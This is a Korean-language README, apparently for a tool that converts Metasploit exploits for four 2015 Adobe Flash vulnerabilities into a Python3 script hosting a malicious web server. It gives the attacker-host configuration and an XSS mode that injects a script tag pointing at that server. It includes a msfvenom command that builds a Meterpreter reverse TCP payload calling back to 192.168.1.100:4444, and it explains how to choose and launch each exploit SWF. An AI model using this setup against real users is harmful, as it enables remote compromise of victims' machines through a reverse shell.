
Adobe Flash 취약점(CVE-2015-3090, CVE-2015-3105, CVE-2015-5119, CVE-2015-5122)용 Metasploit 익스플로잇을 Python3 스크립트로 변환했습니다.
Adobe Flash 취약점 CVE-2015-3090, CVE-2015-3105, CVE-2015-5119 및 CVE-2015-5122에 대한 Metasploit 익스플로잇을 Python3 스크립트로 변환했습니다.
이 스크립트는 다음 Adobe Flash 취약점 중 한 번에 하나씩 악용할 수 있는 웹 서버를 호스팅합니다.
요구 사항에 맞게 exploit.py를 수정해야 합니다(여기에 설명되어 있음).
hostname = "192.168.1.100"
serverPort = 8080
xss = False
True로 설정하면 피해자의 서버에 대한 첫 번째 요청이 JavaScript로 처리됩니다:
<script src="http://192.168.1.100:8080/"></script>False로 설정하면 피해자의 서버에 대한 첫 번째 요청이 HTML로 처리됩니다:
http://192.168.1.100:8080/base64Payload = "..."
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 | base64참고: 저에게 작동한 유일한 페이로드는
windows/meterpreter/reverse_tcp입니다.
swfFile = swfFileList['37368']
swfFileList = {
'37368': 'CVE-2015-3090.swf',
'37448': 'CVE-2015-3105.swf',
'37523': 'CVE-2015-5119.swf',
'37599': 'CVE-2015-5122.swf'
}
악성 swf 파일과 같은 디렉터리에서 다음 명령을 실행하여 Adobe Flash 악용 스크립트를 실행하십시오:
python3 exploit.pyCVE-2015-3090 -> https://exploit-db.com/exploits/37368
CVE-2015-3105 -> https://exploit-db.com/exploits/37448
CVE-2015-5119 -> https://exploit-db.com/exploits/37523
CVE-2015-5122 -> https://exploit-db.com/exploits/37599